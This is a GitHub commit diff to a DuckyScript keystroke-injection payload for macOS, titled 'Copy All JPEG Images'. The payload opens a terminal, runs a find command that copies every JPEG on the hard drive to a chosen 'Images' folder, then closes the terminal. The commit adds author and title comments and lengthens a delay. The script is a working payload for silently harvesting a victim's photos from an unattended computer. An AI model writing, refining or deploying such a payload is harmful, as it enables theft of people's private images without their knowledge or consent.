Update Copy All JPEG Images .txt

This commit is contained in:
Narsty
2023-05-14 18:01:11 -05:00
committed by GitHub
parent 4c5b6d7a3e
commit 8a6efe6328
+5 -1
View File
@@ -2,6 +2,8 @@ REM This script opens the terminal.
REM It searches for all JPEG image files located on the entire hard drive.
REM It copies the found JPEG images to a folder named "Images" in the destination of your choice.
REM you can adjust the Delay paramater on line 21 to capture more or less
REM Author: Narsty
REM Title: Copy All JPEG Images
REM Target: MacOS
@@ -16,5 +18,7 @@ DELAY 1000
ENTER
DELAY 1000
STRING find / -type f -iname "*.jpeg" -exec cp {} ~/Insert Destination here /Images/ \;
DELAY 2000
DELAY 20000
CTRL C
ENTER
GUI q